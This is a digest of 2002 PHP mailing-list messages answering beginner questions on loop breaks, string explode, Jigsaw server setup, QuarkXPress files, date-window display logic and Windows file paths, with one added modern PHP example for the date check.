    > > /*
    > > THE DAILY PLANET
    > >
    > > SUPERMAN SAVES DESSERT!
    > > Plans to "Eat it later"
    > > */
    > >

    -- 
    --------------------------------
    n   i   n   t   i  .   c   o   m
    php-python-perl-mysql-postgresql
    --------------------------------
    Michael Hall     nintininti.com
    --------------------------------
    

    attached mail follows:


    On Wednesday 17 July 2002 04:21, Andy wrote:
    > sounds logical, but what happens with my other php version, where I need
    > the flags?

    Nothing. It will stay as it is.

    > will it still be working?

    Yes.

    > And where is this standalone php version gonna be installed?

    ./configure --help

    to find out how to specify where to install it. Or better still, after "make" do NOT "make install". Then manually copy the php binary to wherever you want. Again this is all covered in the manual.

    -- 
    Jason Wong -> Gremlins Associates -> www.gremlins.com.hk
    Open Source Software Systems Integrators
    * Web Design & Hosting * Internet & Intranet Applications Development *
    

    /* It is better to live rich than to die rich. -- Samuel Johnson */

    attached mail follows:


    Please forgive me, I am still rather new to coding in PHP. I have looked up this problem on the PHP.net site, and checked my syntax, but I am just not getting it.

    Here is my problem: I am working on an email page that will validate that there is content in the variables, and respond if there is not. Here is the code to check the variable:

    If (empty ($sndrname)) {
        $error_report_msg = "Please provide a contact name.<br>";
        error_msg_form($error_report_msg);
        break 1;
    }

    When this is run, the server returns the expected output, but adds the following below it:

    Fatal error: Cannot break/continue 1 levels in /home/igraph/public_html/rhc/inforeq.php on line 82

    Line 82 is the break statement. This code was working at one time, and I changed nothing other than PHP versions. Is there a change due to the versions that I didn't find?

    TIA,
    W. Andy Roche

    attached mail follows:


    Have you tried using just break? without the 1?

    Jason Reid
    jasonachost.ca

    ----- Original Message -----
    From: "W. Andy Roche" <andy.rocheambushsite.com>
    To: <php-generallists.php.net>
    Sent: Tuesday, July 16, 2002 10:11 PM
    Subject: [PHP] Break message in code.

    > Please forgive me, I am still rather new to coding in PHP. I have looked up
    > this problem on the PHP.net site, and checked my syntax, but I am just not
    > getting it.
    >
    > Here is my problem:
    > I am working on an email page that will validate that there is content in
    > the variables, and respond if there is not. Here is the code to check the
    > variable:
    >
    > If (empty ($sndrname)) {
    > $error_report_msg = "Please provide a contact name.<br>";
    > error_msg_form($error_report_msg);
    > break 1;
    > }
    >
    > When this is run, the server returns the expected output, but adds the
    > following below it:
    >
    > Fatal error: Cannot break/continue 1 levels in
    > /home/igraph/public_html/rhc/inforeq.php on line 82
    >
    > Line 82 is the break statement. This code was working at one time, and I
    > changed nothing other than PHP versions. Is there a change due to the
    > versions that I didn't find?
    >
    > TIA,
    > W. Andy Roche
    >
    >
    > --
    > PHP General Mailing List (http://www.php.net/)
    > To unsubscribe, visit: http://www.php.net/unsub.php
    >

    attached mail follows:


    On Tue, Jul 16, 2002 at 11:11:57PM -0500, W. Andy Roche wrote:
    >
    > If (empty ($sndrname)) {
    > $error_report_msg = "Please provide a contact name.<br>";
    > error_msg_form($error_report_msg);
    > break 1;
    > }

    Where's the while loop, for loop or case statement the break is meant to break out of? If there isn't one, break is inappropriate. Do you mean exit()?

    --Dan

    -- 
                   PHP classes that make web design easier
            SQL Solution  |   Layout Solution   |  Form Solution
        sqlsolution.info  | layoutsolution.info |  formsolution.info
     T H E   A N A L Y S I S   A N D   S O L U T I O N S   C O M P A N Y
     4015 7 Av #4AJ, Brooklyn NY     v: 718-854-0335     f: 718-854-0409
    

    attached mail follows:


    Hello,

    I'm trying to explode an associative array element in $HTTP_POST_VARS retrieved from submitting an html form. The URL to the form is: http://www.funfry.com/form.html

    Now when I try to explode $HTTP_POST_VARS["domains"] it doesn't seem to have the desired effect. I use the syntax "$site = explode(" ",$HTTP_POST_VARS["domains"]);" and instead of the expected result of:

    $site[0] = "www.php.net";
    $site[1] = "www.jokaroo.com";
    $site[2] = "www.gnu.org";

    I get:
    $site[0] = "www.php.net www.jokaroo.com www.gnu.org";

    The value of $HTTP_POST_VARS["domains"] after submitting the form is "www.php.net www.jokaroo.com www.gnu.org". Does anyone have an idea of how I can get each domain in a separate array index?

    regards,
    Aleks

    attached mail follows:


    check that the gaps between the domains are really spaces
    eg: echo ord($HTTP_POST_VARS["domains"]{11});

    I did this through a test script:

    <?
    $HTTP_POST_VARS["domains"] = "www.php.net www.jokaroo.com www.gnu.org";
    $site = explode(" ",$HTTP_POST_VARS["domains"]);
    print_r($site);
    exit;
    ?>

    and got this as the output

    Array
    (
        [0] => www.php.net
        [1] => www.jokaroo.com
        [2] => www.gnu.org
    )

    But the email program (yours or mine) might be converting the gap to spaces... (??)

    -----Original Message-----
    From: Aleks D. [mailto:Dugonjicsympatico.ca]
    Sent: Wednesday, July 17, 2002 5:35 PM
    To: php-generallists.php.net
    Subject: [PHP] Bug in PHP?

    Hello,

    I'm trying to explode an associative array element in $HTTP_POST_VARS retrieved from submitting an html form. The URL to the form is: http://www.funfry.com/form.html

    Now when I try to explode $HTTP_POST_VARS["domains"] it doesn't seem to have the desired effect. I use the syntax "$site = explode(" ",$HTTP_POST_VARS["domains"]);" and instead of the expected result of:

    $site[0] = "www.php.net";
    $site[1] = "www.jokaroo.com";
    $site[2] = "www.gnu.org";

    I get:
    $site[0] = "www.php.net www.jokaroo.com www.gnu.org";

    The value of $HTTP_POST_VARS["domains"] after submitting the form is "www.php.net www.jokaroo.com www.gnu.org". Does anyone have an idea of how I can get each domain in a separate array index?

    regards,
    Aleks

    

    attached mail follows:


    Hi Folks:

    A client of mine has a large series of high traffic, PHP/MySQL intensive websites. They're looking for dedicated hosting in Canada. Any recommendations?

    Enjoy,

    --Dan

    -- 
                   PHP classes that make web design easier
            SQL Solution  |   Layout Solution   |  Form Solution
        sqlsolution.info  | layoutsolution.info |  formsolution.info
     T H E   A N A L Y S I S   A N D   S O L U T I O N S   C O M P A N Y
     4015 7 Av #4AJ, Brooklyn NY     v: 718-854-0335     f: 718-854-0409
    

    attached mail follows:


    Some careful testing and results...

    All tests invoke the URL "http://myserver:jigsawport/phpinfo.php"

    Test 1:
    * phpinfo.php contains exactly one line
    <?php phpinfo();?>

    * Jigsaw's debug flag in the default extension indexer cgiframe definition for ".php" files is "true".

    The browser shows a white page with the text:
    X-Powered-By: PHP/4.2.1
    Content-type: text/html

    Invoking the "view->source" menu path launches a notepad session showing exactly the same text as the browser with NO html tags.

    Test 2.
    * phpinfo.php contains exactly one line
    <?php phpinfo();?>

    * Jigsaw's debug flag is "false".

    The browser shows an empty white page.

    Invoking the "view->source" menu path launches a notepad session showing the following:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML><HEAD>
    <META http-equiv=Content-Type content="text/html; charset=windows-1252"></HEAD>
    <BODY></BODY></HTML>

    Test 3.
    * phpinfo.php now contains some trivial container html.
    <html>
    <head><title>phpinfo page</title></head>
    <body>
    phpinfo follows...
    <?php phpinfo();?>
    </body>
    </html>

    * Jigsaw's debug flag is "false".

    The browser shows an empty white page.

    Invoking the "view->source" menu path launches a notepad session showing the following:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML><HEAD>
    <META http-equiv=Content-Type content="text/html; charset=windows-1252"></HEAD>
    <BODY></BODY></HTML>

    The DOS prompt running Jigsaw has the process name "JAVA" until the php page is invoked. At this time it is renamed to php and stays that way. The Jigsaw server, however, does still respond to JigAdmin commands and can be stopped correctly.

    Ummm????????

    Murray Nicholas

    -----Original Message-----
    From: Richard Lynch [mailto:richphpbootcamp.com]
    Sent: Tuesday, 16 July 2002 15:13
    To: php-generallists.php.net
    Subject: [PHP] Re: PHP and Jigsaw

    >With Jigsaw's debug facility Enabled, I get two lines on the page and the
    >same two lines (without html tags of any sort) in "view source" display:
    >X-Powered-By: PHP/4.2.1
    >Content-type: text/html

    If these two lines are showing up in the BROWSER, then something is pretty wrong...

    They're supposed to be headers...

    So something could be sending out a blank line or something before these, somehow...

    If they are just showing up in debugging output, and they *ARE* headers, then PHP *IS* getting invoked, and then dying when it tries to execute your code.

    Try using *JUST* this in your PHP document:

    <?php phpinfo();?>

    It's pretty hard to screw up something that short, so you'll know the PHP is valid :-)

    And, if it works, you get a wonderfully long HTML document spewed out. It's so fun to type so little and get so much :-)

    --
    Like Music?  http://l-i-e.com/artists.htm
    


    attached mail follows:


    On Sun, 14 Jul 2002, Simon Troup wrote:
    > ... quark reports things like unexpected EOF (even though when I open
    > the file in a text editor they have same number of lines and "look"
    > identical), I've also tried a few things with the Mac resource forks to
    > no avail.
    >
    > Has anyone tried something like this before? Does the fread() fwrite()
    > change line endings from mac to unix or something?

    I am guessing the problem is that you're changing string lengths and the data structure used by QuarkXPress contains string length indicators. Once you make a change to the length of a string without changing the length indicator, it gets hopelessly confused.

    Frankly, I do not think this will be an easy project. The QuarkXPress data file is a pretty complex beast.

    What are you actually trying to achieve? Perhaps there is another way.

    miguel

    attached mail follows:


    I've attached a file I received with Quark 3.32, which has sample text complete with Quark Xpress tags.

    Perhaps rather than using PHP to edit a whole .qxd file, perhaps you can use it to help format some text to be imported into a template file. It's not a complete solution, but a part of one -- perhaps to be used in conjunction with AppleScript or Macros? (I think the later quark versions have macros)...

    Just to throw a complete spanner in the works, Adobe InDesign2.0 has a lot of XML capabilities, and much more integrated PDF capabilities than Quark... perhaps either an XML based solution, or a PDFLib based solution can be achieved?

    Considering InDesign is about 1/3rd the price of Quark, *maybe* you might want to consider other options aside from Quark.

    Justin French

    on 17/07/02 4:53 PM, Miguel Cruz (mncstoic.net) wrote:

    > On Sun, 14 Jul 2002, Simon Troup wrote:
    >> ... quark reports things like unexpected EOF (even though when I open
    >> the file in a text editor they have same number of lines and "look"
    >> identical), I've also tried a few things with the Mac resource forks to
    >> no avail.
    >>
    >> Has anyone tried something like this before? Does the fread() fwrite()
    >> change line endings from mac to unix or something?
    >
    > I am guessing the problem is that you're changing string lengths and the
    > data structure used by QuarkXPress contains string length indicators. Once
    > you make a change to the length of a string without changing the length
    > indicator, it gets hopelessly confused.
    >
    > Frankly, I do not think this will be an easy project. The QuarkXPress data
    > file is a pretty complex beast.
    >
    > What are you actually trying to achieve? Perhaps there is another way.
    >
    > miguel
    >

    attached mail follows:


    on 17/07/02 5:28 PM, Justin French (justinindent.com.au) wrote:

    > I've attached a file I received with Quark 3.32, which has sample text
    > complete with Quark Xpress tags.

    Sorry forgot to attach the file!

    Justin

    DropCapParagraphStyle=<*L*h"Standard"*kn0*kt0*ra0*rb0*d(1,3)*p(0,0,0,0,0,0,g)*t(0,0," "): Ps100t0h100z12k0b0c"Black"f"Times"> DropCapParagraphStyle:<*L*h"Standard"*kn0*kt0*ra0*rb0*d(1,3)*p(0,0,0,0,0,0,g)*t(0,0," "): Ps100t0h100z12k0b0c"Black"f"Times">Si meliora dies, ut vina, poemata reddit, scire velim, chartis pretium quotus arroget annus. scriptor abhinc annos centum qui decidit, inter perfectos veteresque referri debet an inter vilis atque novos? Excludat iurgia finis, ÒEst vetus atque probus, cent<P>um qui perficit annos.Ó Quid, qui deperiit minor uno mense vel anno, inter quos referendus erit? Veteresne poetas, an quos et praesens et postera respuat aetas? BodyCopyStyle=<*L*h"Standard"*kn0*kt0*ra0*rb0*d0*p(0,12,0,0,0,0,g)*t(0,0," "): Ps100t0h100z12k0b0c"Black"f"Times"> BodyCopyStyle:<P>ÒIste quidem veteres inter ponetur honeste, qui vel mense brevi vel toto est iunior anno.Ó Utor permisso, caudaeque pilos ut equinae paulatim vello unum, demo etiam unum, dum cadat elusus ratione ruentis acervi, qui redit in fastos et virtutem aestimat ann<P>is miraturque nihil nisi quod Libitina sacravit. <P>Ennius et sapines et fortis et alter Homerus, ut critici dicunt, leviter curare videtur, quo promissa cadant et somnia Pythagorea. Naevius in manibus non est et mentibus haeret paene recens? Adeo sanctum est vetus omne poema. ambigitur quotiens, uter utro <P>sit prior, aufert Pacuvius docti famam senis Accius alti, dicitur Afrani toga convenisse Menandro, Plautus ad exemplar Siculi properare Epicharmi, vincere Caecilius gravitate, Terentius arte. FloatingSubStyle=<*L*h"Standard"*kn0*kt0*ra(24,0,"Blue",100,T0,0,-4.97)*rb0*d0*p(0,0,0,0,12,0,g)*t(12,0," ",93,0," ",0,0," "): PBs50t0h100z18k0b0c"Yellow"f"Times"> FloatingSubStyle: Subhead BodyCopyStyle:<P>Hos ediscit et hos arto stipata theatro spectat Roma potens; habet hos numeratque poetas ad nostrum tempus Livi scriptoris ab aevo. <P>Interdum volgus rectum videt, est ubi peccat. 
Si veteres ita miratur laudatque poetas, ut nihil anteferat, nihil illis comparet, errat. Si quaedam nimis antique, si peraque dure dicere credit eos, ignave multa fatetur, et sapit et mecum facit et Iova iudic<P>at aequo. <P>Non equidem insector delendave carmina Livi esse reor, memini quae plagosum mihi parvo Orbilium dictare; sed emendata videri pulchraque et exactis minimum distantia miror. Inter quae verbum emicuit si forte decorum, et si versus paulo concinnior unus et al<P>ter, iniuste totum ducit venditque poema.

    attached mail follows:


    I am writing one program -

    I want to display some text on web. This text should appear for limited period e.g from 20th July 12pm till 25th July 3pm. After 25th July 3pm the text should disappear from screen.

    I tried to look for date comparison / string conversion to date etc, I got lot info but could not figure out which would be best for above (rather how can I do it).

    Anybody can share some expert comments please ?

    Thanking in advance,
    Manisha

    attached mail follows:


    On Wednesday 17 July 2002 14:55, Manisha wrote:
    > I am writing one program -
    >
    > I want to display some text on web. This text should appear for limited
    > period e.g from 20th July 12pm till 25th July 3pm. After 25th July 3pm the
    > text should disappear from screen.
    >
    > I tried to look for date comparison / string conversion to date etc, I got
    > lot info but could not figure out which would be best for above (rather how
    > can I do it).
    >
    > Anybody can share some expert comments please ?

    1) Use strtotime() to convert your start and end dates to unixtimestamps.

    2) Use time() to get the current unixtimestamp.

    3) Use the standard less-than (<), greater-than (>) comparison operators on the above 3 items to decide whether or not to display the text.

    -- 
    Jason Wong -> Gremlins Associates -> www.gremlins.com.hk
    Open Source Software Systems Integrators
    * Web Design & Hosting * Internet & Intranet Applications Development *
    

    /* A chronic disposition to inquiry deprives domestic felines of vital qualities. */

    attached mail follows:


    I think that it is better to use Unix timestamps, and if you save them to an RDBMS then save according to GMT. When retrieving, use the timezone to convert to your local time, e.g.:

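    define('MY_TIMEZONE', -2);
    // Cast the id to an integer so it cannot change the query (assumes numeric user ids).
    list($time) = mysql_fetch_array(mysql_query('select tstamp from table where user='.intval($user_id).';'));
    // Split the stored GMT timestamp into its parts, then rebuild it shifted by the offset.
    $tt_ar = explode(':', gmstrftime('%H:%M:%S:%m:%d:%Y', $time));
    $local_time = gmmktime($tt_ar[0]+MY_TIMEZONE, $tt_ar[1], $tt_ar[2], $tt_ar[3], $tt_ar[4], $tt_ar[5]);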

    Regards, Andrey

    ----- Original Message -----
    From: "Manisha" <manishaaurica.com>
    To: <php-generallists.php.net>
    Sent: Wednesday, July 17, 2002 9:55 AM
    Subject: [PHP] Require some help about the date comparison

    > I am writing one program -
    >
    > I want to display some text on web. This text should appear for limited
    > period e.g from 20th July 12pm till 25th July 3pm. After 25th July 3pm the
    > text should disappear from screen.
    >
    > I tried to look for date comparison / string conversion to date etc, I got
    > lot info but could not figure out which would be best for above (rather how
    > can I do it).
    >
    > Anybody can share some expert comments please ?
    >
    > Thanking in advance,
    > Manisha
    >
    > --
    > PHP General Mailing List (http://www.php.net/)
    > To unsubscribe, visit: http://www.php.net/unsub.php

    attached mail follows:


    > I want to display some text on web. This text should appear for limited
    > period e.g from 20th July 12pm till 25th July 3pm. After 25th July 3pm the
    > text should disappear from screen.

    <?
    //mktime(hour,minute,second,month,day,year)
    $start = mktime(12,0,0,7,20,2002);
    $end = mktime(15,0,0,7,25,2002);
    $now = time();

    if($now > $start && $now < $end)
    {
        //display text
    }
    else
    {
        //text expired
    }
    ?>

    Something like that. You can use strtotime() instead of mktime() if you want...

    ---John Holmes...
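
    The display-window check from this thread with the timezone made explicit, as an added example that is not code from any of the posters. The Asia/Hong_Kong zone and the helper names parse_local() and in_window() are assumptions; the year 2002 is taken from the mktime() calls above.

```php
<?php
// Added example: decide whether a notice is inside its display window.
// Assumptions (not from the thread): the Asia/Hong_Kong zone and the
// helper names parse_local() and in_window().

function parse_local(string $text, DateTimeZone $tz): DateTimeImmutable
{
    // The leading "!" zeroes every field the format does not name;
    // without it the seconds would be copied from the current clock.
    $dt  = DateTimeImmutable::createFromFormat('!Y-m-d H:i', $text, $tz);
    $err = DateTimeImmutable::getLastErrors();
    // Reject parse failures and silently rolled-over dates (e.g. 31 June).
    if ($dt === false || ($err && ($err['warning_count'] || $err['error_count']))) {
        throw new InvalidArgumentException("Bad date: $text");
    }
    return $dt;
}

function in_window(int $now, DateTimeImmutable $start, DateTimeImmutable $end): bool
{
    if ($end <= $start) {
        throw new InvalidArgumentException('Window ends before it starts');
    }
    // Half-open interval: visible from the start instant, gone at the end instant.
    return $now >= $start->getTimestamp() && $now < $end->getTimestamp();
}

$tz    = new DateTimeZone('Asia/Hong_Kong');   // assumed site timezone
$start = parse_local('2002-07-20 12:00', $tz);
$end   = parse_local('2002-07-25 15:00', $tz);

// Constructed check instants, written in UTC to show that the zone matters.
$samples = ['2002-07-20 03:59:59', '2002-07-20 04:00:00', '2002-07-25 07:00:00'];
foreach ($samples as $utc) {
    $t = (new DateTimeImmutable($utc, new DateTimeZone('UTC')))->getTimestamp();
    echo $utc, ' UTC => ', in_window($t, $start, $end) ? 'show' : 'hide', "\n";
}
// On a live page the check is: in_window(time(), $start, $end)
```

    Pinning the zone in the code keeps the window at the same instants even if the server's default timezone differs from the one the dates were written in.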

    attached mail follows:


    Dear all, I made a test.txt file which is stored in the following Windows path: c:\pdf_reports\dealing\test.txt. In my page, I ask PHP to check whether test.txt exists in the folder (c:\pdf_reports\dealing) using the following script:

    if (file_exists("c:\\pdf_reports\\dealing\\test.txt"))
    {
        print ("exist");
    }
    else
    {
        print ("Doesn't Exist!");
    }

    It seems that PHP can't detect the file in such a path!!! I made another test on this: I moved test.txt one level up, to (c:\pdf_reports), and I used the following script:

    if (file_exists("c:\\pdf_reports\\test.txt"))
    {
        print ("exist");
    }
    else
    {
        print ("Doesn't Exist!");
    }

    Then it can detect the file is there! Why?

    --
    Thx a lot!
    Jack
    nedcor4nedcor.com.hk
    

    attached mail follows:


    > -----Original Message-----
    > From: César Aracena [mailto:icaamicaam.com.ar]
    > Sent: 15 July 2002 03:04

    > This is what I have so far:
    >
    > for ($m=0; $m<$num_rows2; $m++)
    > {
    >     $row2 = mysql_fetch_array($result2);
    >
    >     echo $row2[devlanguage];
    >
    >     if ($m < $num_rows2)
    >     {
    >         echo ", ";
    >     }
    >     else
    >     {
    >         echo ".";
    >     }
    > }

    My approach to this is like this:

    for ($m=0; $m<$num_rows2; $m++)
    {
        $row2 = mysql_fetch_array($result2);

        // The separator goes before every item except the first.
        if ($m>0) echo ', ';
        echo $row2['devlanguage'];
    }
    echo '.';

    Cheers!

    Mike

    ---------------------------------------------------------------------
    Mike Ford, Electronic Information Services Adviser,
    Learning Support Services, Learning & Information Services,
    JG125, James Graham Building, Leeds Metropolitan University,
    Beckett Park, LEEDS, LS6 3QS, United Kingdom
    Email: m.fordlmu.ac.uk
    Tel: +44 113 283 2600 extn 4730 Fax: +44 113 283 3211